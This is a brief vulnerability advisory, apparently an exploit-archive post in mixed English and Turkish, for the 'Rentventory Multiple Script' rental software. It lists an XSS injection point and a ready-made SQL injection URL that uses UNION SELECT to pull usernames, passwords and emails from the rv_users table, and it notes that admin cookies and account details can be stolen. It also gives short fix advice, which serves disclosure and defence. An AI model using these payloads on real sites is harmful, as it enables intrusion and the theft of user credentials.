< ------------------- header data start ------------------- >

#############################################################

# Application Name : Rentventory Multiple Script

# Vulnerable Type : Cross Site Scripting & SqL Injections

# Infection : Yönetici ve User cookie’leri çalinabilir. , Yönetici hesab bilgileri çalinabilir.

# Bug Fix Advice : XSS Fix = Zararli karakterler filtrelenmelidir. , Sql Inj. Fix = Degiskenler Sadece Integer Alacak Sekilde Düzenlenmeli

# Demo : http://www.rentventory.com/demo/

# author : Bug Researchers | Kadir DOGAN


#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

/?product=[Xss]&panel=rent%2Fselect_time

/?start=20090811&panel=rent%2Fselect_time&product=-10+union+select+0,1,concat(username,0x3a,password,0x3a,email),3,4,5,6,7,8,9,10,11+FROM+rv_users

< -- bug code end of -- >